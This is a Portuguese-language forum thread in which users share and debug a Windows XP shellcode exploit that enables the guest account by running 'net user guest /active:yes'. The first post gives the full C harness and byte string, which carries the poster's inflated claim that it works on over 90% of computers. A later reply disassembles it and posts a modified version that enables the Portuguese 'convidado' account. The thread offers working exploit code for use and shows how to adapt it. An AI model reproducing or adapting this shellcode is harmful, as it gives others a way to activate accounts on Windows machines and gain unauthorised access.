Saiu um exploit novo para windows 32 bits, que funciona para mais de 90% dos computadores do planeta hehehe, alguém aí se habilita a testar:
#(+) Exploit Title: win32/xp sp3 Activate Guest Account Shellcode 67 Bytes #(+) Author : ^Xecuti0n3r #(+) E-mail : xecuti0n3r()yahoo.com #(+) Category : win32-Shellcodes #(+) Tested on : Windows Xp 32 bit 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Code: ____________________________________________________________________________________________________ ____________________________________________________________________________________________________ #include <stdio.h> #include <string.h> #include <stdlib.h> char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23" "\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca" "\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63" "\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20" "\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x67\x75\x65\x73\x74\x20\x2f\x61\x63\x74\x69\x76\x65\x3a\x79\x65\x73\x00"; int main(int argc, char **argv) { ((void (*)())code)(); printf("Guest Account Activated"); return 0; } ____________________________________________________________________________________________________ ____________________________________________________________________________________________________ ######################################################################## (+)Exploit Coded by: ^Xecuti0N3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r (+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :) (+)<3 to :Indian Cyber Army & Indishell Crew ######################################################################## Faltou uma pequena parte do código na tela, vc pode estar baixando ele por completo no seguinte link.
quer testar? use o bloodsheed.
ou ta incompleto ou tem que ter alguma falha que nao tenho dos 90%. aqui nao da nada, para ser mais exato ele até da erro qnd tento rodar… mas compila 😀
faz o download dele no link q eu passei ..
sim, mesmo assim da erro ao executar… sabe aquela janela de erro, depurar, enviar relatorio, nao enviar ? entao essa janela aparece depois de compilado e executando.
mesmo apos rodar e unir com o runas /user prog.exe ele nao criou usuario. Tenho uma suspeita que só roda em win xp EN.
rodou ai gustavo ?
Ainda não rodei.. mas a sua suspeita é válida.. eu tenho uma máquina virtual XP en..
Se puder testar e tirar minha duvida agradeco 😀 Tentei outro que diz explicitamente ser em EN. e os codigos se parecem…
http://www.exploit-db.com/exploits/15202/
abcs
Gustavo, ta confirmado. Só funciona em windows EN
observa só o codigo depois de desasembler.
??[1?PS??#??|??1?P?????|???????c?md.exe /c ?net user guest /active:yes??
no PT-BR a conta é convidado… teria que mudar o codigo de maneira que o guest se tornasse convidado.
Logo ele ficará assim:
#include
#include
#include
char code[] = \xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23″
“\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca”
“\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63”
“\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20”
“\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x63\x6f\x6e\x76\x69\x64\x61\x64\x6f\x20\x2f\x61\x63\x74\x69\x76\x65\x3a\x79\x65\x73\x00”;
int main(int argc, char **argv)
{
((void (*)())code)();
printf(“Guest Account Activated”);
return 0;
}
Agora sim vai no PT-BR
Abracos!
show de bola em..